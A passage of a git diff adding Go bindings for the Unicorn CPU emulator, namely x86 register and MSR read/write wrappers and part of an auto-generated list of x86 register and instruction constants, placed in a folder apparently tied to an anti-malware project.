invalid mode: %d != %d", mode, MODE_THUMB) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go new file mode 100644 index 0000000..7ffa25d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86.go @@ -0,0 +1,54 @@ +package unicorn + +import ( + "unsafe" +) + +// #include +// #include +import "C" + +type X86Mmr struct { + Selector uint16 + Base uint64 + Limit uint32 + Flags uint32 +} + +func (u *uc) RegWriteMmr(reg int, value *X86Mmr) error { + var val C.uc_x86_mmr + val.selector = C.uint16_t(value.Selector) + val.base = C.uint64_t(value.Base) + val.limit = C.uint32_t(value.Limit) + val.flags = C.uint32_t(value.Flags) + ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) + return errReturn(ucerr) +} + +func (u *uc) RegReadMmr(reg int) (*X86Mmr, error) { + var val C.uc_x86_mmr + ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) + ret := &X86Mmr{ + Selector: uint16(val.selector), + Base: uint64(val.base), + Limit: uint32(val.limit), + Flags: uint32(val.flags), + } + return ret, errReturn(ucerr) +} + +func (u *uc) RegWriteX86Msr(reg uint64, val uint64) error { + msr := C.uc_x86_msr{ + rid: C.uint32_t(reg), + value: C.uint64_t(val), + } + return errReturn(C.uc_reg_write(u.handle, X86_REG_MSR, unsafe.Pointer(&msr))) +} + +func (u *uc) RegReadX86Msr(reg uint64) (uint64, error) { + msr := C.uc_x86_msr{ + rid: C.uint32_t(reg), + } + ucerr := C.uc_reg_read(u.handle, X86_REG_MSR, unsafe.Pointer(&msr)) + return uint64(msr.value), errReturn(ucerr) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go new file mode 100644 index 0000000..33899a6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/x86_const.go @@ -0,0 +1,1602 @@ +package unicorn +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [x86_const.go] +const ( + +// X86 registers + + X86_REG_INVALID = 0 + X86_REG_AH = 1 + X86_REG_AL = 2 + X86_REG_AX = 3 + X86_REG_BH = 4 + X86_REG_BL = 5 + X86_REG_BP = 6 + X86_REG_BPL = 7 + X86_REG_BX = 8 + X86_REG_CH = 9 + X86_REG_CL = 10 + X86_REG_CS = 11 + X86_REG_CX = 12 + X86_REG_DH = 13 + X86_REG_DI = 14 + X86_REG_DIL = 15 + X86_REG_DL = 16 + X86_REG_DS = 17 + X86_REG_DX = 18 + X86_REG_EAX = 19 + X86_REG_EBP = 20 + X86_REG_EBX = 21 + X86_REG_ECX = 22 + X86_REG_EDI = 23 + X86_REG_EDX = 24 + X86_REG_EFLAGS = 25 + X86_REG_EIP = 26 + X86_REG_EIZ = 27 + X86_REG_ES = 28 + X86_REG_ESI = 29 + X86_REG_ESP = 30 + X86_REG_FPSW = 31 + X86_REG_FS = 32 + X86_REG_GS = 33 + X86_REG_IP = 34 + X86_REG_RAX = 35 + X86_REG_RBP = 36 + X86_REG_RBX = 37 + X86_REG_RCX = 38 + X86_REG_RDI = 39 + X86_REG_RDX = 40 + X86_REG_RIP = 41 + X86_REG_RIZ = 42 + X86_REG_RSI = 43 + X86_REG_RSP = 44 + X86_REG_SI = 45 + X86_REG_SIL = 46 + X86_REG_SP = 47 + X86_REG_SPL = 48 + X86_REG_SS = 49 + X86_REG_CR0 = 50 + X86_REG_CR1 = 51 + X86_REG_CR2 = 52 + X86_REG_CR3 = 53 + X86_REG_CR4 = 54 + X86_REG_CR5 = 55 + X86_REG_CR6 = 56 + X86_REG_CR7 = 57 + X86_REG_CR8 = 58 + X86_REG_CR9 = 59 + X86_REG_CR10 = 60 + X86_REG_CR11 = 61 + X86_REG_CR12 = 62 + X86_REG_CR13 = 63 + X86_REG_CR14 = 64 + X86_REG_CR15 = 65 + X86_REG_DR0 = 66 + X86_REG_DR1 = 67 + X86_REG_DR2 = 68 + X86_REG_DR3 = 69 + X86_REG_DR4 = 70 + X86_REG_DR5 = 71 + X86_REG_DR6 = 72 + X86_REG_DR7 = 73 + X86_REG_DR8 = 74 + X86_REG_DR9 = 75 + X86_REG_DR10 = 76 + X86_REG_DR11 = 77 + X86_REG_DR12 = 78 + X86_REG_DR13 = 79 + X86_REG_DR14 = 80 + X86_REG_DR15 = 81 + X86_REG_FP0 = 82 + X86_REG_FP1 = 83 + X86_REG_FP2 = 84 + X86_REG_FP3 = 85 + X86_REG_FP4 = 86 + X86_REG_FP5 = 87 + X86_REG_FP6 = 88 + X86_REG_FP7 = 89 + X86_REG_K0 = 90 + X86_REG_K1 = 91 + X86_REG_K2 = 92 + X86_REG_K3 = 93 + X86_REG_K4 = 94 + X86_REG_K5 = 95 + X86_REG_K6 = 96 + X86_REG_K7 = 97 + X86_REG_MM0 = 98 + X86_REG_MM1 = 99 + X86_REG_MM2 = 100 + X86_REG_MM3 = 101 + 
X86_REG_MM4 = 102 + X86_REG_MM5 = 103 + X86_REG_MM6 = 104 + X86_REG_MM7 = 105 + X86_REG_R8 = 106 + X86_REG_R9 = 107 + X86_REG_R10 = 108 + X86_REG_R11 = 109 + X86_REG_R12 = 110 + X86_REG_R13 = 111 + X86_REG_R14 = 112 + X86_REG_R15 = 113 + X86_REG_ST0 = 114 + X86_REG_ST1 = 115 + X86_REG_ST2 = 116 + X86_REG_ST3 = 117 + X86_REG_ST4 = 118 + X86_REG_ST5 = 119 + X86_REG_ST6 = 120 + X86_REG_ST7 = 121 + X86_REG_XMM0 = 122 + X86_REG_XMM1 = 123 + X86_REG_XMM2 = 124 + X86_REG_XMM3 = 125 + X86_REG_XMM4 = 126 + X86_REG_XMM5 = 127 + X86_REG_XMM6 = 128 + X86_REG_XMM7 = 129 + X86_REG_XMM8 = 130 + X86_REG_XMM9 = 131 + X86_REG_XMM10 = 132 + X86_REG_XMM11 = 133 + X86_REG_XMM12 = 134 + X86_REG_XMM13 = 135 + X86_REG_XMM14 = 136 + X86_REG_XMM15 = 137 + X86_REG_XMM16 = 138 + X86_REG_XMM17 = 139 + X86_REG_XMM18 = 140 + X86_REG_XMM19 = 141 + X86_REG_XMM20 = 142 + X86_REG_XMM21 = 143 + X86_REG_XMM22 = 144 + X86_REG_XMM23 = 145 + X86_REG_XMM24 = 146 + X86_REG_XMM25 = 147 + X86_REG_XMM26 = 148 + X86_REG_XMM27 = 149 + X86_REG_XMM28 = 150 + X86_REG_XMM29 = 151 + X86_REG_XMM30 = 152 + X86_REG_XMM31 = 153 + X86_REG_YMM0 = 154 + X86_REG_YMM1 = 155 + X86_REG_YMM2 = 156 + X86_REG_YMM3 = 157 + X86_REG_YMM4 = 158 + X86_REG_YMM5 = 159 + X86_REG_YMM6 = 160 + X86_REG_YMM7 = 161 + X86_REG_YMM8 = 162 + X86_REG_YMM9 = 163 + X86_REG_YMM10 = 164 + X86_REG_YMM11 = 165 + X86_REG_YMM12 = 166 + X86_REG_YMM13 = 167 + X86_REG_YMM14 = 168 + X86_REG_YMM15 = 169 + X86_REG_YMM16 = 170 + X86_REG_YMM17 = 171 + X86_REG_YMM18 = 172 + X86_REG_YMM19 = 173 + X86_REG_YMM20 = 174 + X86_REG_YMM21 = 175 + X86_REG_YMM22 = 176 + X86_REG_YMM23 = 177 + X86_REG_YMM24 = 178 + X86_REG_YMM25 = 179 + X86_REG_YMM26 = 180 + X86_REG_YMM27 = 181 + X86_REG_YMM28 = 182 + X86_REG_YMM29 = 183 + X86_REG_YMM30 = 184 + X86_REG_YMM31 = 185 + X86_REG_ZMM0 = 186 + X86_REG_ZMM1 = 187 + X86_REG_ZMM2 = 188 + X86_REG_ZMM3 = 189 + X86_REG_ZMM4 = 190 + X86_REG_ZMM5 = 191 + X86_REG_ZMM6 = 192 + X86_REG_ZMM7 = 193 + X86_REG_ZMM8 = 194 + X86_REG_ZMM9 = 195 + 
X86_REG_ZMM10 = 196 + X86_REG_ZMM11 = 197 + X86_REG_ZMM12 = 198 + X86_REG_ZMM13 = 199 + X86_REG_ZMM14 = 200 + X86_REG_ZMM15 = 201 + X86_REG_ZMM16 = 202 + X86_REG_ZMM17 = 203 + X86_REG_ZMM18 = 204 + X86_REG_ZMM19 = 205 + X86_REG_ZMM20 = 206 + X86_REG_ZMM21 = 207 + X86_REG_ZMM22 = 208 + X86_REG_ZMM23 = 209 + X86_REG_ZMM24 = 210 + X86_REG_ZMM25 = 211 + X86_REG_ZMM26 = 212 + X86_REG_ZMM27 = 213 + X86_REG_ZMM28 = 214 + X86_REG_ZMM29 = 215 + X86_REG_ZMM30 = 216 + X86_REG_ZMM31 = 217 + X86_REG_R8B = 218 + X86_REG_R9B = 219 + X86_REG_R10B = 220 + X86_REG_R11B = 221 + X86_REG_R12B = 222 + X86_REG_R13B = 223 + X86_REG_R14B = 224 + X86_REG_R15B = 225 + X86_REG_R8D = 226 + X86_REG_R9D = 227 + X86_REG_R10D = 228 + X86_REG_R11D = 229 + X86_REG_R12D = 230 + X86_REG_R13D = 231 + X86_REG_R14D = 232 + X86_REG_R15D = 233 + X86_REG_R8W = 234 + X86_REG_R9W = 235 + X86_REG_R10W = 236 + X86_REG_R11W = 237 + X86_REG_R12W = 238 + X86_REG_R13W = 239 + X86_REG_R14W = 240 + X86_REG_R15W = 241 + X86_REG_IDTR = 242 + X86_REG_GDTR = 243 + X86_REG_LDTR = 244 + X86_REG_TR = 245 + X86_REG_FPCW = 246 + X86_REG_FPTAG = 247 + X86_REG_MSR = 248 + X86_REG_MXCSR = 249 + X86_REG_FS_BASE = 250 + X86_REG_GS_BASE = 251 + X86_REG_ENDING = 252 + +// X86 instructions + + X86_INS_INVALID = 0 + X86_INS_AAA = 1 + X86_INS_AAD = 2 + X86_INS_AAM = 3 + X86_INS_AAS = 4 + X86_INS_FABS = 5 + X86_INS_ADC = 6 + X86_INS_ADCX = 7 + X86_INS_ADD = 8 + X86_INS_ADDPD = 9 + X86_INS_ADDPS = 10 + X86_INS_ADDSD = 11 + X86_INS_ADDSS = 12 + X86_INS_ADDSUBPD = 13 + X86_INS_ADDSUBPS = 14 + X86_INS_FADD = 15 + X86_INS_FIADD = 16 + X86_INS_FADDP = 17 + X86_INS_ADOX = 18 + X86_INS_AESDECLAST = 19 + X86_INS_AESDEC = 20 + X86_INS_AESENCLAST = 21 + X86_INS_AESENC = 22 + X86_INS_AESIMC = 23 + X86_INS_AESKEYGENASSIST = 24 + X86_INS_AND = 25 + X86_INS_ANDN = 26 + X86_INS_ANDNPD = 27 + X86_INS_ANDNPS = 28 + X86_INS_ANDPD = 29 + X86_INS_ANDPS = 30 + X86_INS_ARPL = 31 + X86_INS_BEXTR = 32 + X86_INS_BLCFILL = 33 + X86_INS_BLCI = 34 + X86_INS_BLCIC = 
35 + X86_INS_BLCMSK = 36 + X86_INS_BLCS = 37 + X86_INS_BLENDPD = 38 + X86_INS_BLENDPS = 39 + X86_INS_BLENDVPD = 40 + X86_INS_BLENDVPS = 41 + X86_INS_BLSFILL = 42 + X86_INS_BLSI = 43 + X86_INS_BLSIC = 44 + X86_INS_BLSMSK = 45 + X86_INS_BLSR = 46 + X86_INS_BOUND = 47 + X86_INS_BSF = 48 + X86_INS_BSR = 49 + X86_INS_BSWAP = 50 + X86_INS_BT = 51 + X86_INS_BTC = 52 + X86_INS_BTR = 53 + X86_INS_BTS = 54 + X86_INS_BZHI = 55 + X86_INS_CALL = 56 + X86_INS_CBW = 57 + X86_INS_CDQ = 58 + X86_INS_CDQE = 59 + X86_INS_FCHS = 60 + X86_INS_CLAC = 61 + X86_INS_CLC = 62 + X86_INS_CLD = 63 + X86_INS_CLFLUSH = 64 + X86_INS_CLFLUSHOPT = 65 + X86_INS_CLGI = 66 + X86_INS_CLI = 67 + X86_INS_CLTS = 68 + X86_INS_CLWB = 69 + X86_INS_CMC = 70 + X86_INS_CMOVA = 71 + X86_INS_CMOVAE = 72 + X86_INS_CMOVB = 73 + X86_INS_CMOVBE = 74 + X86_INS_FCMOVBE = 75 + X86_INS_FCMOVB = 76 + X86_INS_CMOVE = 77 + X86_INS_FCMOVE = 78 + X86_INS_CMOVG = 79 + X86_INS_CMOVGE = 80 + X86_INS_CMOVL = 81 + X86_INS_CMOVLE = 82 + X86_INS_FCMOVNBE = 83 + X86_INS_FCMOVNB = 84 + X86_INS_CMOVNE = 85 + X86_INS_FCMOVNE = 86 + X86_INS_CMOVNO = 87 + X86_INS_CMOVNP = 88 + X86_INS_FCMOVNU = 89 + X86_INS_CMOVNS = 90 + X86_INS_CMOVO = 91 + X86_INS_CMOVP = 92 + X86_INS_FCMOVU = 93 + X86_INS_CMOVS = 94 + X86_INS_CMP = 95 + X86_INS_CMPPD = 96 + X86_INS_CMPPS = 97 + X86_INS_CMPSB = 98 + X86_INS_CMPSD = 99 + X86_INS_CMPSQ = 100 + X86_INS_CMPSS = 101 + X86_INS_CMPSW = 102 + X86_INS_CMPXCHG16B = 103 + X86_INS_CMPXCHG = 104 + X86_INS_CMPXCHG8B = 105 + X86_INS_COMISD = 106 + X86_INS_COMISS = 107 + X86_INS_FCOMP = 108 + X86_INS_FCOMPI = 109 + X86_INS_FCOMI = 110 + X86_INS_FCOM = 111 + X86_INS_FCOS = 112 + X86_INS_CPUID = 113 + X86_INS_CQO = 114 + X86_INS_CRC32 = 115 + X86_INS_CVTDQ2PD = 116 + X86_INS_CVTDQ2PS = 117 + X86_INS_CVTPD2DQ = 118 + X86_INS_CVTPD2PS = 119 + X86_INS_CVTPS2DQ = 120 + X86_INS_CVTPS2PD = 121 + X86_INS_CVTSD2SI = 122 + X86_INS_CVTSD2SS = 123 + X86_INS_CVTSI2SD = 124 + X86_INS_CVTSI2SS = 125 + X86_INS_CVTSS2SD = 126 + 
X86_INS_CVTSS2SI = 127 + X86_INS_CVTTPD2DQ = 128 + X86_INS_CVTTPS2DQ = 129 + X86_INS_CVTTSD2SI = 130 + X86_INS_CVTTSS2SI = 131 + X86_INS_CWD = 132 + X86_INS_CWDE = 133 + X86_INS_DAA = 134 + X86_INS_DAS = 135 + X86_INS_DATA16 = 136 + X86_INS_DEC = 137 + X86_INS_DIV = 138 + X86_INS_DIVPD = 139 + X86_INS_DIVPS = 140 + X86_INS_FDIVR = 141 + X86_INS_FIDIVR = 142 + X86_INS_FDIVRP = 143 + X86_INS_DIVSD = 144 + X86_INS_DIVSS = 145 + X86_INS_FDIV = 146 + X86_INS_FIDIV = 147 + X86_INS_FDIVP = 148 + X86_INS_DPPD = 149 + X86_INS_DPPS = 150 + X86_INS_RET = 151 + X86_INS_ENCLS = 152 + X86_INS_ENCLU = 153 + X86_INS_ENTER = 154 + X86_INS_EXTRACTPS = 155 + X86_INS_EXTRQ = 156 + X86_INS_F2XM1 = 157 + X86_INS_LCALL = 158 + X86_INS_LJMP = 159 + X86_INS_FBLD = 160 + X86_INS_FBSTP = 161 + X86_INS_FCOMPP = 162 + X86_INS_FDECSTP = 163 + X86_INS_FEMMS = 164 + X86_INS_FFREE = 165 + X86_INS_FICOM = 166 + X86_INS_FICOMP = 167 + X86_INS_FINCSTP = 168 + X86_INS_FLDCW = 169 + X86_INS_FLDENV = 170 + X86_INS_FLDL2E = 171 + X86_INS_FLDL2T = 172 + X86_INS_FLDLG2 = 173 + X86_INS_FLDLN2 = 174 + X86_INS_FLDPI = 175 + X86_INS_FNCLEX = 176 + X86_INS_FNINIT = 177 + X86_INS_FNOP = 178 + X86_INS_FNSTCW = 179 + X86_INS_FNSTSW = 180 + X86_INS_FPATAN = 181 + X86_INS_FPREM = 182 + X86_INS_FPREM1 = 183 + X86_INS_FPTAN = 184 + X86_INS_FFREEP = 185 + X86_INS_FRNDINT = 186 + X86_INS_FRSTOR = 187 + X86_INS_FNSAVE = 188 + X86_INS_FSCALE = 189 + X86_INS_FSETPM = 190 + X86_INS_FSINCOS = 191 + X86_INS_FNSTENV = 192 + X86_INS_FXAM = 193 + X86_INS_FXRSTOR = 194 + X86_INS_FXRSTOR64 = 195 + X86_INS_FXSAVE = 196 + X86_INS_FXSAVE64 = 197 + X86_INS_FXTRACT = 198 + X86_INS_FYL2X = 199 + X86_INS_FYL2XP1 = 200 + X86_INS_MOVAPD = 201 + X86_INS_MOVAPS = 202 + X86_INS_ORPD = 203 + X86_INS_ORPS = 204 + X86_INS_VMOVAPD = 205 + X86_INS_VMOVAPS = 206 + X86_INS_XORPD = 207 + X86_INS_XORPS = 208 + X86_INS_GETSEC = 209 + X86_INS_HADDPD = 210 + X86_INS_HADDPS = 211 + X86_INS_HLT = 212 + X86_INS_HSUBPD = 213 + X86_INS_HSUBPS = 214 + 
X86_INS_IDIV = 215 + X86_INS_FILD = 216 + X86_INS_IMUL = 217 + X86_INS_IN = 218 + X86_INS_INC = 219 + X86_INS_INSB = 220 + X86_INS_INSERTPS = 221 + X86_INS_INSERTQ = 222 + X86_INS_INSD = 223 + X86_INS_INSW = 224 + X86_INS_INT = 225 + X86_INS_INT1 = 226 + X86_INS_INT3 = 227 + X86_INS_INTO = 228 + X86_INS_INVD = 229 + X86_INS_INVEPT = 230 + X86_INS_INVLPG = 231 + X86_INS_INVLPGA = 232 + X86_INS_INVPCID = 233 + X86_INS_INVVPID = 234 + X86_INS_IRET = 235 + X86_INS_IRETD = 236 + X86_INS_IRETQ = 237 + X86_INS_FISTTP = 238 + X86_INS_FIST = 239 + X86_INS_FISTP = 240 + X86_INS_UCOMISD = 241 + X86_INS_UCOMISS = 242 + X86_INS_VCOMISD = 243 + X86_INS_VCOMISS = 244 + X86_INS_VCVTSD2SS = 245 + X86_INS_VCVTSI2SD = 246 + X86_INS_VCVTSI2SS = 247 + X86_INS_VCVTSS2SD = 248 + X86_INS_VCVTTSD2SI = 249 + X86_INS_VCVTTSD2USI = 250 + X86_INS_VCVTTSS2SI = 251 + X86_INS_VCVTTSS2USI = 252 + X86_INS_VCVTUSI2SD = 253 + X86_INS_VCVTUSI2SS = 254 + X86_INS_VUCOMISD = 255 + X86_INS_VUCOMISS = 256 + X86_INS_JAE = 257 + X86_INS_JA = 258 + X86_INS_JBE = 259 + X86_INS_JB = 260 + X86_INS_JCXZ = 261 + X86_INS_JECXZ = 262 + X86_INS_JE = 263 + X86_INS_JGE = 264 + X86_INS_JG = 265 + X86_INS_JLE = 266 + X86_INS_JL = 267 + X86_INS_JMP = 268 + X86_INS_JNE = 269 + X86_INS_JNO = 270 + X86_INS_JNP = 271 + X86_INS_JNS = 272 + X86_INS_JO = 273 + X86_INS_JP = 274 + X86_INS_JRCXZ = 275 + X86_INS_JS = 276 + X86_INS_KANDB = 277 + X86_INS_KANDD = 278 + X86_INS_KANDNB = 279 + X86_INS_KANDND = 280 + X86_INS_KANDNQ = 281 + X86_INS_KANDNW = 282 + X86_INS_KANDQ = 283 + X86_INS_KANDW = 284 + X86_INS_KMOVB = 285 + X86_INS_KMOVD = 286 + X86_INS_KMOVQ = 287 + X86_INS_KMOVW = 288 + X86_INS_KNOTB = 289 + X86_INS_KNOTD = 290 + X86_INS_KNOTQ = 291 + X86_INS_KNOTW = 292 + X86_INS_KORB = 293 + X86_INS_KORD = 294 + X86_INS_KORQ = 295 + X86_INS_KORTESTB = 296 + X86_INS_KORTESTD = 297 + X86_INS_KORTESTQ = 298 + X86_INS_KORTESTW = 299 + X86_INS_KORW = 300 + X86_INS_KSHIFTLB = 301 + X86_INS_KSHIFTLD = 302 + X86_INS_KSHIFTLQ = 303 + 
X86_INS_KSHIFTLW = 304 + X86_INS_KSHIFTRB = 305 + X86_INS_KSHIFTRD = 306 + X86_INS_KSHIFTRQ = 307 + X86_INS_KSHIFTRW = 308 + X86_INS_KUNPCKBW = 309 + X86_INS_KXNORB = 310 + X86_INS_KXNORD = 311 + X86_INS_KXNORQ = 312 + X86_INS_KXNORW = 313 + X86_INS_KXORB = 314 + X86_INS_KXORD = 315 + X86_INS_KXORQ = 316 + X86_INS_KXORW = 317 + X86_INS_LAHF = 318 + X86_INS_LAR = 319 + X86_INS_LDDQU = 320 + X86_INS_LDMXCSR = 321 + X86_INS_LDS = 322 + X86_INS_FLDZ = 323 + X86_INS_FLD1 = 324 + X86_INS_FLD = 325 + X86_INS_LEA = 326 + X86_INS_LEAVE = 327 + X86_INS_LES = 328 + X86_INS_LFENCE = 329 + X86_INS_LFS = 330 + X86_INS_LGDT = 331 + X86_INS_LGS = 332 + X86_INS_LIDT = 333 + X86_INS_LLDT = 334 + X86_INS_LMSW = 335 + X86_INS_OR = 336 + X86_INS_SUB = 337 + X86_INS_XOR = 338 + X86_INS_LODSB = 339 + X86_INS_LODSD = 340 + X86_INS_LODSQ = 341 + X86_INS_LODSW = 342 + X86_INS_LOOP = 343 + X86_INS_LOOPE = 344 + X86_INS_LOOPNE = 345 + X86_INS_RETF = 346 + X86_INS_RETFQ = 347 + X86_INS_LSL = 348 + X86_INS_LSS = 349 + X86_INS_LTR = 350 + X86_INS_XADD = 351 + X86_INS_LZCNT = 352 + X86_INS_MASKMOVDQU = 353 + X86_INS_MAXPD = 354 + X86_INS_MAXPS = 355 + X86_INS_MAXSD = 356 + X86_INS_MAXSS = 357 + X86_INS_MFENCE = 358 + X86_INS_MINPD = 359 + X86_INS_MINPS = 360 + X86_INS_MINSD = 361 + X86_INS_MINSS = 362 + X86_INS_CVTPD2PI = 363 + X86_INS_CVTPI2PD = 364 + X86_INS_CVTPI2PS = 365 + X86_INS_CVTPS2PI = 366 + X86_INS_CVTTPD2PI = 367 + X86_INS_CVTTPS2PI = 368 + X86_INS_EMMS = 369 + X86_INS_MASKMOVQ = 370 + X86_INS_MOVD = 371 + X86_INS_MOVDQ2Q = 372 + X86_INS_MOVNTQ = 373 + X86_INS_MOVQ2DQ = 374 + X86_INS_MOVQ = 375 + X86_INS_PABSB = 376 + X86_INS_PABSD = 377 + X86_INS_PABSW = 378 + X86_INS_PACKSSDW = 379 + X86_INS_PACKSSWB = 380 + X86_INS_PACKUSWB = 381 + X86_INS_PADDB = 382 + X86_INS_PADDD = 383 + X86_INS_PADDQ = 384 + X86_INS_PADDSB = 385 + X86_INS_PADDSW = 386 + X86_INS_PADDUSB = 387 + X86_INS_PADDUSW = 388 + X86_INS_PADDW = 389 + X86_INS_PALIGNR = 390 + X86_INS_PANDN = 391 + X86_INS_PAND = 392 + 
X86_INS_PAVGB = 393 + X86_INS_PAVGW = 394 + X86_INS_PCMPEQB = 395 + X86_INS_PCMPEQD = 396 + X86_INS_PCMPEQW = 397 + X86_INS_PCMPGTB = 398 + X86_INS_PCMPGTD = 399 + X86_INS_PCMPGTW = 400 + X86_INS_PEXTRW = 401 + X86_INS_PHADDSW = 402 + X86_INS_PHADDW = 403 + X86_INS_PHADDD = 404 + X86_INS_PHSUBD = 405 + X86_INS_PHSUBSW = 406 + X86_INS_PHSUBW = 407 + X86_INS_PINSRW = 408 + X86_INS_PMADDUBSW = 409 + X86_INS_PMADDWD = 410 + X86_INS_PMAXSW = 411 + X86_INS_PMAXUB = 412 + X86_INS_PMINSW = 413 + X86_INS_PMINUB = 414 + X86_INS_PMOVMSKB = 415 + X86_INS_PMULHRSW = 416 + X86_INS_PMULHUW = 417 + X86_INS_PMULHW = 418 + X86_INS_PMULLW = 419 + X86_INS_PMULUDQ = 420 + X86_INS_POR = 421 + X86_INS_PSADBW = 422 + X86_INS_PSHUFB = 423 + X86_INS_PSHUFW = 424 + X86_INS_PSIGNB = 425 + X86_INS_PSIGND = 426 + X86_INS_PSIGNW = 427 + X86_INS_PSLLD = 428 + X86_INS_PSLLQ = 429 + X86_INS_PSLLW = 430 + X86_INS_PSRAD = 431 + X86_INS_PSRAW = 432 + X86_INS_PSRLD = 433 + X86_INS_PSRLQ = 434 + X86_INS_PSRLW = 435 + X86_INS_PSUBB = 436 + X86_INS_PSUBD = 437 + X86_INS_PSUBQ = 438 + X86_INS_PSUBSB = 439 + X86_INS_PSUBSW = 440 + X86_INS_PSUBUSB = 441 + X86_INS_PSUBUSW = 442 + X86_INS_PSUBW = 443 + X86_INS_PUNPCKHBW = 444 + X86_INS_PUNPCKHDQ = 445 + X86_INS_PUNPCKHWD = 446 + X86_INS_PUNPCKLBW = 447 + X86_INS_PUNPCKLDQ = 448 + X86_INS_PUNPCKLWD = 449 + X86_INS_PXOR = 450 + X86_INS_MONITOR = 451 + X86_INS_MONTMUL = 452 + X86_INS_MOV = 453 + X86_INS_MOVABS = 454 + X86_INS_MOVBE = 455 + X86_INS_MOVDDUP = 456 + X86_INS_MOVDQA = 457 + X86_INS_MOVDQU = 458 + X86_INS_MOVHLPS = 459 + X86_INS_MOVHPD = 460 + X86_INS_MOVHPS = 461 + X86_INS_MOVLHPS = 462 + X86_INS_MOVLPD = 463 + X86_INS_MOVLPS = 464 + X86_INS_MOVMSKPD = 465 + X86_INS_MOVMSKPS = 466 + X86_INS_MOVNTDQA = 467 + X86_INS_MOVNTDQ = 468 + X86_INS_MOVNTI = 469 + X86_INS_MOVNTPD = 470 + X86_INS_MOVNTPS = 471 + X86_INS_MOVNTSD = 472 + X86_INS_MOVNTSS = 473 + X86_INS_MOVSB = 474 + X86_INS_MOVSD = 475 + X86_INS_MOVSHDUP = 476 + X86_INS_MOVSLDUP = 477 + 
X86_INS_MOVSQ = 478 + X86_INS_MOVSS = 479 + X86_INS_MOVSW = 480 + X86_INS_MOVSX = 481 + X86_INS_MOVSXD = 482 + X86_INS_MOVUPD = 483 + X86_INS_MOVUPS = 484 + X86_INS_MOVZX = 485 + X86_INS_MPSADBW = 486 + X86_INS_MUL = 487 + X86_INS_MULPD = 488 + X86_INS_MULPS = 489 + X86_INS_MULSD = 490 + X86_INS_MULSS = 491 + X86_INS_MULX = 492 + X86_INS_FMUL = 493 + X86_INS_FIMUL = 494 + X86_INS_FMULP = 495 + X86_INS_MWAIT = 496 + X86_INS_NEG = 497 + X86_INS_NOP = 498 + X86_INS_NOT = 499 + X86_INS_OUT = 500 + X86_INS_OUTSB = 501 + X86_INS_OUTSD = 502 + X86_INS_OUTSW = 503 + X86_INS_PACKUSDW = 504 + X86_INS_PAUSE = 505 + X86_INS_PAVGUSB = 506 + X86_INS_PBLENDVB = 507 + X86_INS_PBLENDW = 508 + X86_INS_PCLMULQDQ = 509 + X86_INS_PCMPEQQ = 510 + X86_INS_PCMPESTRI = 511 + X86_INS_PCMPESTRM = 512 + X86_INS_PCMPGTQ = 513 + X86_INS_PCMPISTRI = 514 + X86_INS_PCMPISTRM = 515 + X86_INS_PCOMMIT = 516 + X86_INS_PDEP = 517 + X86_INS_PEXT = 518 + X86_INS_PEXTRB = 519 + X86_INS_PEXTRD = 520 + X86_INS_PEXTRQ = 521 + X86_INS_PF2ID = 522 + X86_INS_PF2IW = 523 + X86_INS_PFACC = 524 + X86_INS_PFADD = 525 + X86_INS_PFCMPEQ = 526 + X86_INS_PFCMPGE = 527 + X86_INS_PFCMPGT = 528 + X86_INS_PFMAX = 529 + X86_INS_PFMIN = 530 + X86_INS_PFMUL = 531 + X86_INS_PFNACC = 532 + X86_INS_PFPNACC = 533 + X86_INS_PFRCPIT1 = 534 + X86_INS_PFRCPIT2 = 535 + X86_INS_PFRCP = 536 + X86_INS_PFRSQIT1 = 537 + X86_INS_PFRSQRT = 538 + X86_INS_PFSUBR = 539 + X86_INS_PFSUB = 540 + X86_INS_PHMINPOSUW = 541 + X86_INS_PI2FD = 542 + X86_INS_PI2FW = 543 + X86_INS_PINSRB = 544 + X86_INS_PINSRD = 545 + X86_INS_PINSRQ = 546 + X86_INS_PMAXSB = 547 + X86_INS_PMAXSD = 548 + X86_INS_PMAXUD = 549 + X86_INS_PMAXUW = 550 + X86_INS_PMINSB = 551 + X86_INS_PMINSD = 552 + X86_INS_PMINUD = 553 + X86_INS_PMINUW = 554 + X86_INS_PMOVSXBD = 555 + X86_INS_PMOVSXBQ = 556 + X86_INS_PMOVSXBW = 557 + X86_INS_PMOVSXDQ = 558 + X86_INS_PMOVSXWD = 559 + X86_INS_PMOVSXWQ = 560 + X86_INS_PMOVZXBD = 561 + X86_INS_PMOVZXBQ = 562 + X86_INS_PMOVZXBW = 563 + 
X86_INS_PMOVZXDQ = 564 + X86_INS_PMOVZXWD = 565 + X86_INS_PMOVZXWQ = 566 + X86_INS_PMULDQ = 567 + X86_INS_PMULHRW = 568 + X86_INS_PMULLD = 569 + X86_INS_POP = 570 + X86_INS_POPAW = 571 + X86_INS_POPAL = 572 + X86_INS_POPCNT = 573 + X86_INS_POPF = 574 + X86_INS_POPFD = 575 + X86_INS_POPFQ = 576 + X86_INS_PREFETCH = 577 + X86_INS_PREFETCHNTA = 578 + X86_INS_PREFETCHT0 = 579 + X86_INS_PREFETCHT1 = 580 + X86_INS_PREFETCHT2 = 581 + X86_INS_PREFETCHW = 582 + X86_INS_PSHUFD = 583 + X86_INS_PSHUFHW = 584 + X86_INS_PSHUFLW = 585 + X86_INS_PSLLDQ = 586 + X86_INS_PSRLDQ = 587 + X86_INS_PSWAPD = 588 + X86_INS_PTEST = 589 + X86_INS_PUNPCKHQDQ = 590 + X86_INS_PUNPCKLQDQ = 591 + X86_INS_PUSH = 592 + X86_INS_PUSHAW = 593 + X86_INS_PUSHAL = 594 + X86_INS_PUSHF = 595 + X86_INS_PUSHFD = 596 + X86_INS_PUSHFQ = 597 + X86_INS_RCL = 598 + X86_INS_RCPPS = 599 + X86_INS_RCPSS = 600 + X86_INS_RCR = 601 + X86_INS_RDFSBASE = 602 + X86_INS_RDGSBASE = 603 + X86_INS_RDMSR = 604 + X86_INS_RDPMC = 605 + X86_INS_RDRAND = 606 + 